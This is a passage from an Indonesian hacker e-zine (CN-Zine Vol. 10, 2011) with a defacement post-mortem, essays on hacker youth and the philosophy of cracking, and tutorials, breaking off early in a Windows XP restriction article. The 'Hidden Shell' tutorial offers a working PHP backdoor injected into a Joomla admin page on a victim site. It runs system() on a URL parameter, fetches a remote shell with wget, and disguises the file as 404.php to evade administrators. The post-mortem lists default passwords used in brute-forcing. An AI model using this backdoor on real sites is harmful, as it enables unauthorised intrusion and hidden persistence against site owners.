didownload secara gratis

CN-ZINE Apa itu CN-Zine? Majalah

online

hasil

karya

para

member

Codenesia

yang

dapat

diunduh/didownload secara gratis. Sejarah CN-ZINE (Codenesia Magazine) ? Kebutuhan akan informasi, artikel dan tutorial semakin banyak sehingga Komunitas Codenesia.com memutuskan untuk merilis sebuah magazine untuk komunitas IT di Indonesia. Tujuan dibuatnya codenesia Magazine? Saling berbagi ilmu, Menyebar luaskankan ilmu seputar Antivirus, Virus, Hacking, Crack, All of Computer untuk tujuan positif. Hak cipta / Lisensi : Seluruh

materi

codenesia

Magazine

dapat

didownload,

dibaca,

disebarkan secara bebas untuk tujuan bukan komersial(nonprofit), dengan syarat tidak menghapus atau merubah nama penulis. Distribusi Codenesia Magazine : Codenesia Magazine hanya boleh di download melalui link download counter

yang

disediakan

bertujuan

agar

Member

berkunjung

ke

Codenesia

oleh

website

Codenesia,

hal

ini

dari

Codenesia

menjadi

aktif

untuk

dan

mengunduh

langsung

dari

server

codenesia. Contact Codenesia Magazine : YM admin codenesia (anharku ,hirin, ajrnea) [email protected]

2

CN-Zine Vol. #10 “Segala isi materi dan tutorial di-dalam majalah elektronik ini adalah hak cipta dan tanggung jawab masing-masing penulis. Anda diizinkan untuk mempublikasi ulang tanpa se-izin dari masing-masing penulis dengan tanpa merubah nama dan atribut penulis”.

Ide dan Desain Cover : HakZ & anharku

Layouter : anharku

Editor : A.M Hirin

Copyright @ 2011 – Codenesia

www.codenesia.com www.forum.codenesia.com Build Indonesia With Code

3

PEMBUKA CODENESIA.COM Defaced by Hmei7 Dengan ini saya selaku admin Codenesia memberikan pernyataan atas kejadian "Suspended" Kemarin... Sebenarnya sengaja di suspend sama mimin AJRNEA karena website codenesia telah di deface.. awalmula kejadian: deface oleh Hmei7 dilakukan 2011-07-09 18:33:12 cek disini: http://www.zone-h.org/mirror/id/14381356

ternyata yg deface CN ga cuma satu orang namun ada lagi yg lainnya deface oleh k4l0ng666 2011-07-09 19:30:06 http://www.zone-h.org/mirror/id/14381429 saat saya konfirmasi dari kedua difacer tersebut bagaimana bisa masuk ke websaya ternyata jawabannya adalah: konfirmasi dari hmei7

4

panjang lebar kali tingginya sih kaya gini: n1cedre4m: pa omz anharku: beh anharku: takoni apik2 ga jawab anharku: depes webku yo anharku: mlebu lewat ngendi om? n1cedre4m: he`eh, om hakz wis tekon n1cedre4m: ws tk kandani, n1cedre4m: lewat uwuhjogja.com anharku: hmmm :-? n1cedre4m: http://wedanguwuhjogja.com anharku: wingi aku yo diceritani ambe' om kalong666 anharku: lewat wp yo anharku: bug's wordpress opo iku? n1cedre4m: iyow, @kite2 isone isih bruteforce, isih jajal2+bejan2an

5

n1cedre4m: orak bugs anharku: oohh... n1cedre4m: jajal brute anharku: lha terus n1cedre4m: uwuh jogja, pass diantara n1cedre4m: admin,admin123,12345,123456,qwerty anharku: oh..ngono..

konfirmasi dari kalong

kalo sama kalong panjang lebarnya pembicaraan hotnya seperti ini hijackedan: mas.maaf soal codenesia maren hijackedan: ane cuma titip html aja anharku: sante om anharku: aku malah pengen ngerti anharku: sampean mlebu lewat ngendi? hijackedan: smf forume mas

6

anharku: reset password admin forum po? hijackedan: iyo mas hijackedan: terus edit template anharku: wew... hijackedan: tak ganti uploader anharku: manteb.. anharku: terus2 bug's e sebelah ngendi omz anharku: men aku iso ndandani iki... hijackedan: iku msalahe ng serpere mas hijackedan: cuma jumping anharku: jumping seko ngensi anharku: ngendi? hijackedan: sek mas tak ceke hijackedan: lali soale anharku: yoh... hijackedan: teko web wp mas,seng passwde standart anharku: wordpresse sopo iku? ono link'e? sak server karo codenesia po? hijackedan: iyo mas hijackedan: webe lali hijackedan: iki sek tak goleki anharku: yoh... hijackedan: wedanguwuhjogja.com hijackedan: iku mas anharku: wooo... ngono dadi ceritane piye iku... reset password admin SMF forum opo jumping sih?? malah bingung aku omzz.. hijackedan: pertama tak jumping mas,terus tak reset passwde admine hijackedan: :D anharku: walah sikak... anharku: ngono toh ceritane.. anharku: ngerti aku,.. hijackedan: masalahe permssn buat confignya bisa dibaca mas anharku: terus biar ga kebaca gimana omz? hijackedan: dulu blogq tak kasih permssn 400 mas anharku: kayaknya yg satu server sama CN itu banyak web juga je... hijackedan: tapi itu tergantung serper juga hijackedan: ada yg dikasih 400 malah eroor anharku: ohh gitu,.. anharku: soal wp tadi bugs WP password standart itu yg kaya gimana?? yg gampang di bruteforce? hijackedan: betul mas

7

hijackedan: itu kena brute anharku: ampun deh...

nb: maaf perbincangan diatas menggunakan bahasa jawa, mohon gunakan google translate untuk lebih mudah menterjemahkannya ke bahasa indonesia hhhh.... awalnya saya menduga pasti om hmei7 masuk lewat reset password admin SMF FORUM CN karena kalo lewat DRUPAL sepertinya susah...jarang exploit / bugs di drupal. dugaan diperkuat laporan om HIRIN bahwa ada e-mail konfirmasi reset password di [email protected] sebanyak 4 buah e-mail. ternyata benar jumping dari http://wedanguwuhjogja.com masih satu server dengan CODENESIA yang cmsnya wordpress lalu reset password admin SMF FORUM ganti template jd uploader baru tanam shell baru passang index depesan :'( untungnya mimin kita AJRNEA cukup tanggap terhadap masalah ini... membersihkan shell yg tertanam di server CODENESIA dan akhirnya CN bisa UP lagi... terimakasih om ajrnea atas kerja kerasnya...

untuk om hmei7 dan om k4l0ng666 trimakasih sudah test securty CN.. catatan penting untuk para pengguna CMS WORDPRESS: "MOHON lebih memperhatikan sisi keamanan WORDPRESS karena bug's pada wp telah banyak diketahui oleh para dedemit maya, misalnya dalam membuat password wordpress jangan menggunakan password standar atau yang biasa digunakan seperti admin,admin123,12345,123456,qwerty karena password2 tersebut mudah di BRUTE FORCE, buat password yang lebih susah misal 10 karakter kombinasi huruf dan angka. Setting permission confignya jd drwxr-x--x Not writable biar ga bisa di jumping ke folder tempat web berada" “NOTHING IS SECURE” Terimakasih untuk para defacer yang telah memberi pelajaran berharga bagi kami.. mungkin ini pelajaran untuk kita semua By Admin Ganteg

8

DAFTAR ISI

 Pembuka……………………………………………………………………………………………………………………….………………..4  Menumbuhkan Kecintaan Menulis di Internet ………………….……………………….………………………………….10  SAATNYA HACKER MUDA MERUBAH DUNIA!!! By: Nofia………………………………………….…………………..16  Filosofi Cracking Software By: Nofia………………………………….…………………………………………….…………….16  Hidden Shell By: anharku……………………. ………………..……………….……………………………………….……………21  Restriksi Aplikasi/Program Tertentu di Windows XP by X-Cisadane………………………………….……………25  Membuat Page untuk Anonymous Email & Mail Boomber By: anharku…..…………………………….….….39  Recode Webshell by oRb to 404 Not Found by : c0d3HitLER………………………………….………………………44  Bobol Dekstop Locker By: Ridho………………………………….………………………………………………………………..50  Sebuah Tulisan dengan Character Map by : VirSpector………………………………….………………………………53  Easy Download Youtube By : Ezha Vangeance………………………………….……………………………………………56  Hack Aplikasi Handcent SMS Android By: anharku………………..….………………………………….……………….59  EXPLOIT JPEG By: J0ck3r………………………………….……………………………………………………..61  Produk Codenesia………………………………….……………………………………………………………….……………………..67  Kaos Codenesia………………………………….……………………………………………………………….…………………………68  BOOKS FOR SALE………………………………….……………………………………………………………….………………………70  PARTNER & Codenesia Group………………………………….……………………………………………………………….……71  Donasi………………………………….……………………………………………………………….……………………………………….72  Cara Kirim Artikel Untuk Cn-Zine Edisi Berikutnya………………………………….………………………………………73

9

Menumbuhkan Kecintaan Menulis di Internet Menulis memang sesuatu yang susah itu sih kata orang yang sulit mengungkapkan pikirannya dalam kata-kata. Namun untuk orang yang suka mengungkapkan pikiran pada kata-kata menulis menjadi sesuatu yang mudah. Memang butuh keberanian untuk menulis, apalagi menulis sesuatu untuk dipublikasikan di internet. Untuk menumbuhkan kecintaan kita dalam menulis mungkin kalian semua bisa memulainya dengan membuat artikel di blog atau membuat artikel lalu mengirimkannya ke website agar dapat dipublikasikan dan dibaca oleh banyak orang (netter). Karna codenesia juga merupakan website yg menyalurkan karya tulis / artikel dari membernya. Untuk mengirimkan artikel ke codenesia caranya adalah sebagai berikut :

1. Login dulu….

2. Pada bagian kanan website ada fitur KIRIM KONTEN, klik KIRIM ARTIKEL

10

3. Tulis artikelmu semenarikmungkin, jangan lupa jika ada sumber / referensinya tulis juga sumbernya.

4. Setelah itu SAVE aja. Tunggu hingga sang ADMIN CODENESIA mempublikasi artikelmu / accept artikel.

11

5. Artikelmu telah dipublikasi di WEBSITE CODENESIA.

Nah sudah tahu kan cara menulis artikel untuk website kesayanganmu? Ayo buruan kirim artikel semenarik mungkin ke codenesia. Dengan terus berkarya maka kamu akan mendapatkan banyak ilmu yang bermanfaat 

“ilmu yang terus dibagi dan diamalkan akan terus berkembang, sedang ilmu yang dipendam sendiri tidak akan berkembang, justru akan hilang dan menjadi rahasia yg terlupakan  “

By: Admin Ganteng Codenesia

12

SAATNYA HACKER MUDA MERUBAH DUNIA!!!!!! By: Nofia

Kaum Muda sesungguhnya tersimpan jiwa pemberontakan dalam diri mereka: “Ada jiwa pemberontakan dalam diri anak muda, itulah yang kupercaya bahwa kita diciptakan untuk merubah dunia. Masa depan bukan soal siapa yang telah menciptakan hari kemarin, melainkan siapa yang akan merubah hari esok. Karenanya kau bukan generasi muda jika tidak mampu menggores sejarah dengan menciptakan masa depan untuknya.”

Kaum muda sesungguhnya terinspirasi dari para pendahulu mereka: “Di setiap tetes darah yang mengaliri tubuhku dan disetiap denyut nadi serta tarikan nafasku, bersemayam roh-roh kalian yang suci, para imajiner masa lalu.”

Kaum Muda sesungguhnya adalah mereka yang berani dan siap menantang masa depan: .....Wahai esok hari Rentangkan sayapmu tuk hadang kami Yang sudah terlalu menyala dibakar semangat Dan telah muak untuk tunduk dan diperalat (Belati Putra)

Kaum Muda sesungguhnya adalah mereka yang membuang jauh fikiran pesimis: “Seribu anak muda “optimis” dengan belajar dari sejarah belum tentu membawa perubahan, tapi satu anak muda “pesimis” dengan belajar dari sejarah bisa jadi kehancuran.”

Kaum Muda sesungguhnya adalah mereka yang menyadari peran sebagai agent of change: Aku adalah generasi muda, menjadi bagian dari ”Agent of Change” tanah air. Misiku sangat berat, bertanggungjawab atas nasib bangsa Indonesia kedepan. Kelak aku akan menjadi pemimpin, menjadi bagian dari pembuat kebijakan atau yang menjalankan. Aku adalah ‘pemain’ yang akan berupaya sekuat tenaga merealisasikan apa yang terbaik untuk bangsaku.

13

Kaum Muda sesungguhnya adalah mereka yang selalu bangkit dari keterpurukan: Kubangunkan akustikku yang setelah sekian lama mengalami mati suri; kupanggil pulang insting dan feelingku yang sedang melakukan perjalanan akhirat tanpa batas; kuarahkan kembali barisan lirik-lirik lama yang nyaris tersesat dalam mesin maya; dan ku rekontruksi bangunan ide dan pondasi imajinasi yang hampir runtuh dimakan waktu. “Saatnya mengaransemen hidup!!!!.” Kaum Muda sesungguhnya adalah ‘generasi pemberi’ yang terbaik untuk lingkungannya: Aku bersumpah tidak akan ada satu kabar buruk pun sampai ke telinga kalian, wahai Para Penerusku. Jika pun angin menerbangkannya, kan kurentangkan sayapku lebar-lebar menghadang, hingga mereka melebur diudara.

Kaum Muda sesungguhnya adalah generasi yang tak pernah mati untuk bangsanya: Generasi muda adalah tonggak berdirinya suatu bangsa, jika mereka kokoh maka kokohlah suatu bangsa. Generasi muda siap mendangak ditengah teriknya siang hari, menatap langit dan menantang matahari, menaklukan panasnya udara yang membakar. Generasi muda siap mengembangkan sayap-sayap mereka lebar-lebar, terbang tinggi bebas diudara, menggapai langit, menyebrangi lautan dan menakhlukan hutan-hutan rimba, baik dalam terang maupun dalam gelap.

Saatnya Hacker Muda Merubah Dunia:

Kemampuan dan kecerdasanku adalah sebuah kontribusi abadi untuk masa depan yang damai, sebagaimana yang diimpikan para pendahuluku dan menjadi impianku untuk para penerusku. Kemampuan dan kecerdasanku adalah ‘tak ternilai’ tak terukur kapasitasnya. Seberapa jauh pun kau mencoba mengeksplorasi kemampuan dan kecerdasanku terus menjangkiti dimensi-dimensi maya dan menginfeksi dengan munculnya kode-kode baru yang akan merubah dunia. Kemampuan dan kecerdasanku adalah ‘senjata’ tak bertuan yang dapat mematikan secepat cahaya ketika aku berada dititik akumulatif kemarahan pada dunia yang termanipulasi oleh ketidakadilan. Kemampuan dan kecerdasanku tidak akan pernah mati pudar dimakan waktu, akan terus mengdiaspora, bermain dalam kernel-kernel diruang maya demi menciptakan dunia baru. Kemampuan dan kecerdasanku akan merubah dunia…

14

Aku adalah anak muda tanpa lintas generasi, dan kami adalah hacker muda yang siap merubah dunia. Semenjak manifesto hacker THE MENTOR di munculkan kami selalu percaya bahwa kami dianugrahi kecerdasan dan kemampuan untuk merubah dunia. ________________________________________________________________________________ Kupersembahkan untuk generasi muda tanah air yang percaya tentang peran mereka sebagai penentu masa depan bangsa yang percaya bahwa kemampuan mereka harus digunakan untuk menciptakan masa depan dunia yang damai, yang percaya bahwa anak muda harus berkontribusi untuknya.

Wahai kaum muda mulailah dengan membangun ‘conviction’ (keyakinan) dari dalam dirimu tentang dunia diluar sana, karenanya kaulah yang dibutuhkan dunia hari ini.!!

“Aku adalah orang yang selalu percaya bahwa kalian cerdas, dan akan selalu cerdas. Karenanya aku percaya kalian dapat merubah dunia. Sebut aku idealis jika kalian membaca tulisanku, aku pun ingin kalian menjadi idealis, bukan untukku, tapi untuk kalian, untuk orangtua kalian, untuk keluarga kalian, untuk orang-orang yang kalian sayangi, untuk tanah air dimana ada garuda didada kalian, untuk dunia dimana kalian menjadi penghuni terakhirnya. Jika apa yang aku fikirkan ini non-sense mungkin kalianlah yang tahu apa yang masuk akal. Jika apa yang aku fikirkan ini logis mungkin kalian jualah yang tahu bagaimana menyempurnakannya.”

“Saatnya HACKER Muda Merubah DUNİA, Karena di Dada Kita Ada GARUDA, Save the World, Hack the Planet, Free the Universe!!!!!!” (Nofia, TURKEY 2011) *Penulis adalah mahasiswa M.A Program International Political Economy (IPE), Department of International Relations, EMU (Turkey). Aktif menulis seputar politik dan hacking computer. (Email: [email protected]).

15

Filosofi Cracking Software By: Nofia Berabad-abad yang lalu sang penemu benua Amerika Napoleon Bonaparte menyebut ‘politics is destiny’’, hari ini katakanlah ‘technology is destiny’ setelah jutaan inovasi teknologi berhasil membentuk takdir manusia, termasuk diantaranya teknologi komputer. Di era modern dimana teknologi komputer menjangkiti pelosok jagad raya, sebaliknya, para filsuf dunia justru menyebut kemajuan teknologi sebagai produk hyperintelligen (co: Heiddeger dan Derrida) yang berdampak negatif bagi kehidupan manusia di dunia. Karenanya, kritik filsafat terhadap kemajuan teknologi sesungguhnya harus direspon dengan mengeksplorasi ‘teknologi sebagai takdir’ menggunakan pendekatan-pendekatan filsafat itu sendiri. Pernah dengar istilah kalau ahli komputer (and either hackers or crackers) kadang lebih filosofis dari filsuf itu sendiri? Atau istilah kalau ahli komputer kadang lebih politis dari politisi itu sendiri? Dan lebih ekonomis daripada ekonom itu sendiri? Teknologi dan Filsafat Teralineasi Bahwa tidak ada yang luput dari cara pandang filsafat, termasuk pembangunan teknologi. Satu hal yang dikhawatirkan para filsuf ketika mengkaji kemajuan teknologi adalah bahwa mereka yang melibatkan diri dalam dunia komputer dan terjun jauh mengeksplorasinya adalah individu-individu teralienasi. Pertanyaannya, apakah mereka yang menghabiskan waktu bersama ribuan kode-kode bahasa pemproggramman teralineasi? Argumentasikan. Paling tidak ada dua profesi yang ketika mereka sibuk dengan dunianya, nyaris tersesat dalam pertarungan individu dengan dirinya sendiri. Profesi pertama, filsuf, yang ketika sedang mengeksplorasi isi kepala terjebak dalam ruang kosong yang membuat ia sibuk berjibaku memutar-mutar logika berfikir. Profesi kedua adalah mereka yang ketika mengebiri binary teralienasi dan tak jarang menyesatkan diri sendiri dalam ruang maya, hanyut bersama ribuan kode-kode bahasa pemproggraman.

16

Namun demikian, filsafat sesungguhnya tidak pernah menyesatkan manusia, karena filsafat dapat menjawab setiap motif dari human actions, termasuk Cracking Software. Tersesatnya manusia dalam proses berfikir karena mereka memiiliki kapasitas otak yang tak terbatas. Karenanya jangan pernah ragu untuk mengeksplorasi kemampuanmu memecahkan permasalahanpermasalahan rumit seperti logika berfikir dan mengebiri ribuan kode bahasa pemprograman, kau sesungguhnya adalah ‘Master of Mind.’ Filsafat dan Motif Cracking Kalau kalian pernah melakukan cracking software pasti akrab sama yang namanya program dissassembler Win32dasm, or debugger Olydbg/softice Win APİ, sampai Ultra Edit32, Hiew, etc. Tools tersebut digunakan untuk meng-crack software, demi untuk menciptakan sesuatu yang beda!!! Dari patching, serial fishing alias hunting serial number, sampai bikin KeyGens. Suatu proses yang menantang, kalau kata filsuf ‘menjelajahi ruang dan waktu untuk menemukan solusi kehidupan.’ Sebelum berfilosofi diwilayah cracking software, sekedar ngingetin, kalau dulu biasanya nge-crack software mungkin hanya membutuhkan waktu 5 smpai 30 menit, tapi sekarang? Kelihatannya programmer makin cerdas berstrategi dalam karya-karyanya ya. Sebagai contoh, berapa lama waktu yang kamu butuhkan untuk nemuin perintah-perintah ‘registrasi’? Istilah-istilah seperti registrasi error, incomplete or incorrect information, or bla..bla…bla… hari ini gk seutuhnya tercetak ‘percis’ alias seperti yang muncul di nag-screen begitu code-code badan software ditrace di dissassembler kamu. Mau jump sana jump sini, push sana push sini, break sana break sini, patch sana patch sini mesti sukses melewati proses panjang terlebih dulu karena perintah-perintah registrasi tersebut diproteksi dengan sempurna sama empunya alias susah dikenali or istilahnya ‘a key based protection’ salah-salah nyampelah di ‘file invalid’ alias gagal sudah karena usaha anda telah di ‘cutdown.’ Kalaupun gak nemu option itu, tetep waktu mengdissassembler software abis ditahapan awal, misalnya karena software gak punya opsi registrasi, kalau kata pemain bola ‘kerja-keras di 15 menit pertama untuk membobol pertahanan lawan.’ Selanjutnya kita bermain-main dengan filosofi. Motif cracking software: dalam salahsatu tutorial cracking yang ditulis mahasiswa asing, dia ngungkapin ‘saya melakukan software karena ilham mimpi,

17

menjelajahi dunia dan tertantang menakhlukannya’ aneh ya kedengarannya. Ceritanya begini, para cracker (atau pun hacker) adalah orang-orang yang senang berkelana, masuk kewilayah-wilayah yang belum pernah terjamah, mengebiri ratusan dan ribuan kode dalam bahasa pemprogaman. Prinsip mereka ‘semakin sulit software di dissassembler atau semakin susah sistem komputer satu web diakses, semakin memuncak adrenalin mereka untuk menaklukannya.’ Jadi salah satu motif cracking atau hacking adalah ‘kesenangan menemukan tantangan.’ Kalau kata Descartes bapak filsafat pencerahan ‘cogito ergo sum’ artinya ‘karena berfikir saya ada’, nah kalau waktu nge-crack otak gak dikuras abis sampe pusing tujuh-keliling jangan pernah berfikir bahwa kalian sukses ‘eksis’ sebagai si ahli komputer. Kalau dalam politik, make otak gagal saatnya make otot, tapi kalau dalam teknologi komputer, make otot buat apa? Otak adalah ‘perangkat’ utama dalam proses cracking software, bahwa si cracker dituntut untuk berfikir filosofis, ‘menemukan sesuatu yang sifatnya dasar atau fundamental (namun kadang terhidden dan memerlukan perhitungan yang matang).’ Ciri seorang filsuf adalah menemukan suatu ‘esensi’ terpendam yang ada dalam kehidupan tapi belum tersentuh manusia "to boldly go where no one has gone before" (Captain Jean Luc Picard, Startrek Next Generation). Motif kedua sangat erat kaitannya dengan ‘prinsip distribusi’ bahwa karya-karya bermanfaat tersebut seharusnya dapat dinikmati setiap pengguna komputer atau mereka yang membutuhkan. Para cracker software seneng banget kalau tutorialnya berguna buat orang lain dan kalau software-software yang didissassemblernya disebar ke kalangan maya, nginfoin serial number or bagi-bagi Keygens, macem ‘berbuat baik untuk mendapat pahala’. Tidak jarang dari mereka yang nawarin diri untuk bantuin ngecrack software. Kalau diskusi sama kawan politik or hukum, mereka pasti pernah menyebut John Rawls, filsuf modern yang juga pemikir politik-hukum yang terkenal dengan prinsip ‘distribusi keadilan’ (distribution of justice). Nah buat mereka yang terlibat dalam cracking software, prinsip distribusi adalah apa yang disebut ‘fair’ (adil) dalam dunia maya, kalau dapet bocoran software yang dibebaskan orang lain maka harus

memberi

keadilan

untuk

orang

lain

dengan

juga

membebaskan

software

dan

mendistribusikannya.

18

Motif ketiga mereka yang ‘melek politik-paham ekonomi’ bakal bilang ‘software-software tersebut seharusnya dapat dimanfaatin setiap orang tanpa harus membayar mahal.’ Bayangin kalau file-recover harganya mencapai 150 dollar, bisa buat beli memori dan hard disk baru. Suatu nafas anti-kapitalis, anti hegemoni dan eksploitasi korporasi, mengutamakan solidaritas, satu prinsip bahwa manusia sesungguhnya bebas namun terikat. Bebas berkarya, bebas merubah satu karya namun terikat oleh lingkungan dimana ia tinggal, kalau mengutip Rousseau “man was born free and he is everywhere in chains.” Sementara motif terakhir sudah jelas, yaitu untuk tujuan pendidikan.

Political-Economy of Software Building Nah sekarang saatnya merespon motif cracking No.3. Langsung saja, kalau dalam kajian ekonomi-politik ada yang namanya ‘intangible assets’ (hal-hal berharga yang tidak dapat diraba) yang bikin software jadi mahal. Bahwa sesuatu yang lahir dari knowledge or skills sangat bernilai atau apa yang disebut dengan ‘the value of information.’ Karena begitu berharganya ‘karya cipta’ tersebut si programmer yang kekeh sama prinsip ‘fundamental paradox of information’ gak akan secara gampang ngejual karya ciptanya ke perusahaan, simple karena dia gak mau softwarenya dimonopoli sama satu korporasi tertentu. Tapi ada juga programmer yang otaknya ‘uang’ aja, berstrategi supaya karya ciptanya bisa menghasilkan profit, karenanya informasi sangat mahal dan berfikir dua kali untuk menyerahkannya ke korporat. Kalau programmer kasih software tapi gk kasih informasi gimana cara buat softwarenya, gimana perusahaan mau deal? Nah untuk mengakomodasi hal tersebut alhasil terbentuklah apa yang namanya ‘Firms’ horizontal integration’ dimana satu software dihandle (diproduksi dan didistribusi) sama lebih dari satu perusahaan untuk menjamin tidak adanya monopoli. Tapi gimanapun juga karena perusahaan pastinya berorientasi profit, jadilah software-software tersebut terjual mahal karena mempertimbangkan profit untuk lebih dari satu perusahaan. Jadi kalau RMS sudah sejak lama berteriak soal open source dan kemerdekaan software, ini persoalannya. Untuk menjawab ‘luka batin’ para programmer kalau perusahaan-perusahaan berorientasi profit tersebut bakal memonopoli produk. Kenyataannya sama juga kan, tidak dimonopoli pun melibatkan banyak perusahaan, jatuhnya mahal-mahal juga. Ya itulah ekonomi-politik, makanya

19

lumrah kalau aksi-aksi hacking or cracking berangkat dari mereka yang menentang monopoli korporat atas satu karya cipta, itulah politik. Sekali lagi programmer kadang lebih politis dari politisi itu sendiri. Yang juga mungkin bisa bikin kalian buka mata, pernah denger politisasi anti-virus, kalau virus-virus komputer yang beredar sesungguhnya diciptakan oleh para perusahaan pembuat anti-virus. Kalau masalah tidak diciptakan, maka tidak ada pasar, alias kalau gk ada virus siapa yang mau beli anti-virus. Sampai di sini dapat poinnya? Well, saya cuma mau mengajak kawan-kawan bermain-main sedikit dengan filsafat dan ekonomi-politik dalam kaitannya dengan pembangunan teknologi (komputer), jadi kita tidak melihat segala sesuatunya dari sebelah mata. Memahami filosofi dalam berkomputer-ria adalah bahwa dalam melakukan suatu aksi kita selalu dilandasi oleh sebuah pandangan atau alasan ‘kenapa sampai berbuat hacking or cracking’ gk sebatas iseng, just for fun, keuntungan pribadi atau menguji kesabaran orang lain. Kalau bermaksud menguji kemampuan pribadi, jangan pernah lupa kalau kalian hidup ditengah-tengah masyarakat yang berbeda kepribadian. Artikel ini tidak menganjurkan atau melegalkan ‘cracking’ terhadap software-software komputer, karena sesungguhnya software adalah ‘produk intelektual’ programmer yang mesti dihargai, hanya saja dihakciptakan perusahaan ‘yang memproduksi dan mendistribusikan.’ Sekarang balik lagi ke urusan manusia dan filosofi aksi-aksi mereka. Apa bener kalau yang bikin software itu alias si programmer sepakat ciptaannya di jual mahal ke publik? Balik lagi deh nanya ke si programmer, mereka bakal jawab ‘programmer juga manusia.’ Kalau nanya ke produser or distributornya mereka juga bakalan jawab ‘pasar perlu produk sementara produser perlu modal, hasilnya sama-sama mendapat profit.’ “SELAMAT BERFILSAFAT DALAM TEKNOLOGI” *Penulis adalah mahasiswa M.A Program International Political Economy (IPE), Department of International Relations, EMU (Turkey). Aktif menulis seputar politik dan hacking computer. (Email: [email protected]). ** Seputar Political-Economy of Software Building akan lebih jauh dieksplorasi penulis dalam forthcoming article “The Political-Economy of Hacking Computer” (September 2011)

20

Hidden Shell By: anharku a.k.a r13y5h4 Mungkin banyak shell kalian yang sudah angus karena ketahuan om admin dan kena delete. Tapi mungkin Trick berikut ini dapat kamu gunakan agar shell kamu lebih awet walau tanpa bahan pengawet seperti BORAX hhhhh…. Apa sih emang makanan dikasih BORAX =)) Lanjut aja gausah banyak bac0t siapkan: 1. Web target biasanya server LINUX, 2. Shell, 3. Kopi, UDUD….Putar 3gp eh salah putar MP3 “Bondan,Kita Selamanya” hhhhh…. Anggap saja saya sudah deface web target POC cari sendiri ya di 1337day, exploit-db, exploit-id, atau di joomlaexploit. Buka shellnya buat edit index.php administratornya.

Injec t pakai code simple backdoor. Berikut code simple backdoor nya: if(isset($_GET['error']))

21

{ echo " "; echo '<pre>';system($_GET['error']);echo ''; } ?> Penjelasan code: if(isset($_GET function isset() ini digunakan untuk mendeteksi apakah suatu variabel sudah ada dalam memory atau belum. Bila variabel sudah ada dalam memory, maka isset() akan memberikan nilai TRUE, dan FALSE bila sebaliknya.

$_GET berfungsi untuk mendapatkan value dengan menggunakan metode get. if(isset($_GET['error']) ini akan memberikan nilai TRUE, dan bila bernilai TRUE maka selanjutnya adalah proses membaca valuenya. Proses membacanya adalah cukup memanggil variabel $_GET['error']) Misalnya code ['error']. Pada code tersebut mendapatkan nilai TRUE saat fungsi GET terpenuhi yaitu penulisan code ['error']. Saat nilai tersebut terpenuhi maka akan menjalankan perintah selanjutnya misal: system($_GET['cmd'] digunakan untuk mengeksekusi command kedalam server. contoh: cmd=dir Dir: digunakan untuk mengetahui isi direktori server Kalo ;system($_GET['error'] berarti perintahnya http://target.com/administrator/index.php?error=dir

22

fungsi GET terpenuhi yaitu penulisan http://target.com/administrator/index.php?error=dir maka perintah selnjutnya yah pemanggilan command dir yaitu mengetahui isi direktori servernya , keluar deh isi direktori administratornya di bagian bawah dari page halaman login admin joomla (index.php).

Kita bisa juga meng-uploadkan shell ke dalam website tersebut dengan mengetikkan perintah wget seperti berikut di URL http://target.com/administrator/index.php?error=wget http://domain.com/xxx/shell.php wget yaitu perintah untuk mengambil materi dari web server, bisa juga dartikan perintah yang dijalankan pada terminal untuk mengunduh halaman website dengan hanya menuliskan URL dari website tersebut misal wget http://domain.com/xxx/shell.php

Terus cek lagi dagh isi direktorinya dengan mengetik perintah seperti sebelumnya. Nah dagh masuk tuh shellnya namanya 404.php (nama 404.php biar ga’ mencolok, takut ketahuan bung mimin  )

Halaman admin (index.php) tersebut jika di buka dengan hanya menulisakan http://target.com/administrator/index.php maka yg keluar adalah halaman admin biasa tak ada sedikit pun kecurigaan kalau di dalamnya sebenarnya mengandung backdoor. Jika URL tersebut ditambah perintah selanjutnya baru deh keluar shellnya :p . Mungkin admin akan mengetahui bahwa web tersebut telah di inject script backdoor jika membongkar code dari index.php administrator tersebut. Sekarang sudah mengerti kan bagaimana menyisipkan shell ke dalam website target. Kita dapat juga mengembangkannya dengan menyisipkan uploader ke website target. Misalnya seperti berikut.

23

Udagh gitu tinggal dipanggil deh uploadernya….  Ketik di URL http://target.com/administrator/index.php?error Tralala..keluar dagh tombol browse cari shell kamu lalu upload lageeee…. 

Sekian saja artikel cupu dari saya… akhir kata “SERAPAT-RAPATNYA MENYIMPAN BANGKAI PASTI BAUNYA TERCIUM JUGA, SERAPAT-RAPATNYA MENYEMBUNYIKAN SHELL PASTI AKHIRNYA KETAHUAN JUGA HHHHHH….” Thanks to: Member Codenesia, YF/ X-CODE, IDC, IH, HN, DC and INDONESIANDEFACER By: anharku a.k.a r13y5h4 http://codenesia.com

24

Restriksi Aplikasi/Program Tertentu di Windows XP by: - Dwi a.k.a Kali Cisadane (X-Cisadane) Salam sejahtera para Pembaca sekalian, kali ini Penulis akan mensharing sebuah trick yang sedikit banyak bermanfaat bagi para pengguna Windows. Masih banyak warnet ataupun rental komputer yang menggunakan Sistem Operasi besutan Microsoft ini. Dan tak jarang pula banyak orang yang iseng atau bahkan jahil dengan menggunakan program tertentu untuk melakukan suatu pengrusakan atau hanya sekedar melakukan tindakan prank. Hal ini merupakan suatu masalah bagi para pemilik warnet ataupun rental komputer. Tak heran jika kita menggunakan jasa warnet ataupun rental komputer, pasti komputer yang kita pakai akan terproteksi dengan Deep Freeze ataupun piranti lunak sejenisnya. Para pengelola warnet atau rental komputer merasa aman dengan memasangi piranti lunak seperti itu, padahal kita tahu jikalau piranti lunak tersebut sudah memiliki ‘anti’ nya. So… Cara tersebut hanya sia-sia dan tidak terlalu efektif. Sekarang ada kasus seperti ini : Pada salah satu komputer di warnet X terinstall Deep Freeze, kemudian Mr.Hacker datang ke warnet tersebut dan membobol Deep Freezenya lalu Mr.Hacker menginstall Keylogger merek xXx yang dapat mengirim Log ke E-Mailnya Mr.Hacker dan kemudian Mr.Hacker menginstall lagi Deep Freezenya. Tentu saja ini akan menjadi hal yang berbahaya bagi siapa saja yang menggunakan komputer tersebut, iya khan? Kejadian di atas merupakan salah satu dari sekian banyak kelalaian pengelola warnet ataupun rental komputer. Sebagai operator atau pengelola warnet seharusnya kita melakukan antisipasi sejak dini dan mengutamakan keamanan serta kenyamanan bagi para pelangganya. Kalau sudah kejadian seperti pada kasus di atas, maka pelanggan pun akan kapok menggunakan jasa warnet atau rental komputer anda, iya khan? Oke… Sekarang kita akan melakukan sedikit pengaturan kebijakan pada Windows yang kita gunakan. Penulis menggunakan Sistem Operasi Windows XP SP3 dalam melakukan percobaan ini, restriksi yang akan kita lakukan menggunakan 4 metode dimulai dengan : 1.Restriksi Aplikasi/Program tertentu dengan membaca File Name

25

